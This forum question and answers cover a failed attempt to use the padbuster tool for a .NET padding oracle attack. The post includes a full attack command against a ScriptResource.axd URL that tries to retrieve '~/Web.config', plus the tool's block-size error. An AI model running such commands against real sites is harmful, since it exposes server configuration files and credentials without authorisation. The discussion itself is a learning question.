# Question about padbuster ... newbie

Tags: web-application, penetration-test

**New to this type of attack trying to understand this .net oracle padding attack, i'm using this data :**

```
padbuster https://victim.org/ScriptResource.axd?d=EkIw9i8hChjP_nuqGrT3s8rxntkAiG3TGimvybqMf__tcw10GCO0odSOA1XbLy49N6SbB7O3zkdZuSKdG8IJgRcjH0myrb2kCR0Epem-HDIB7vYIUr_71uvYarEEFTV6Szv50Wpsr0A0218420DiUU1D4-NcTi4zxgAJaW8owIQ1 EkIw9i8hChjP_nuqGrT3s8rxntkAiG3TGimvybqMf__tcw10GCO0odSOA1XbLy49N6SbB7O3zkdZuSKdG8IJgRcjH0myrb2kCR0Epem-HDIB7vYIUr_71uvYarEEFTV6Szv50Wpsr0A0218420DiUU1D4-NcTi4zxgAJaW8owIQ1 -plaintext "|||~/Web.config" 16
```

**And i see this error:**

```
+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

ERROR: Encrypted Bytes must be evenly divisible by Block Size (16)
       Encrypted sample length is 124. Double check the Encoding and Block Size.
```

I'm doing something wrong ? or what is the correct block size 124 ??

Comment: I haven't used padbuster, but that error message seems straightforward enough: your sample length is not divisible by 16.

Comment: well that is the reply i was expecting if the evenly divisible size of the Encrypted bytes posted on the input is not 16 then 2 for example would work, but doens't

Answer (score 1):

The block size has to match the block size used by the server. Hence specifying 2 won't work, the sample size may be divisible by it, but it won't match the actual block size. Judging by the sample length alone I suspect it is not vulnerable.